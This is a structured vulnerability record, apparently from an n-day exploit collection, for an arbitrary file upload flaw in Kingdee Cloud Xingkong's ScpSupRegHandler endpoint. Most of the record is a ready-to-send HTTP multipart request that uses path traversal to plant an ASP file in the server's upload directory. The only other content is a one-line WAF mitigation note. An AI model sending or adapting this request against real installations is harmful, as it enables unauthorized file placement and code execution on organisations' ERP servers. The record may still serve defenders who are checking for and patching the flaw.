vendor = "金蝶"
name = "金蝶云星空ScpSupRegHandler任意文件上传漏洞"
type = "RCE"
version = "未知"
path = "/k3cloud/SRM/ScpSupRegHandler"
detail = "POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1 Host: Accept-Encoding: identity Content-Length: 285 Accept-Language: zh-CN,zh;q=0.8 Accept: */* Cache-Control: max-age=0 Content-Type: multipart/form-data; boundary=test --test Content-Disposition: form-data; name=\"dbId_v\" . --test Content-Disposition: form-data; name=\"FID\" 2022 --test Content-Disposition: form-data; name=\"FAtt\"; filename=\"../../../../uploadfiles/test.asp.\" Content-Type: text/plain <% Response.Write(\"test\") %> --test--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0812"
label = "nday"
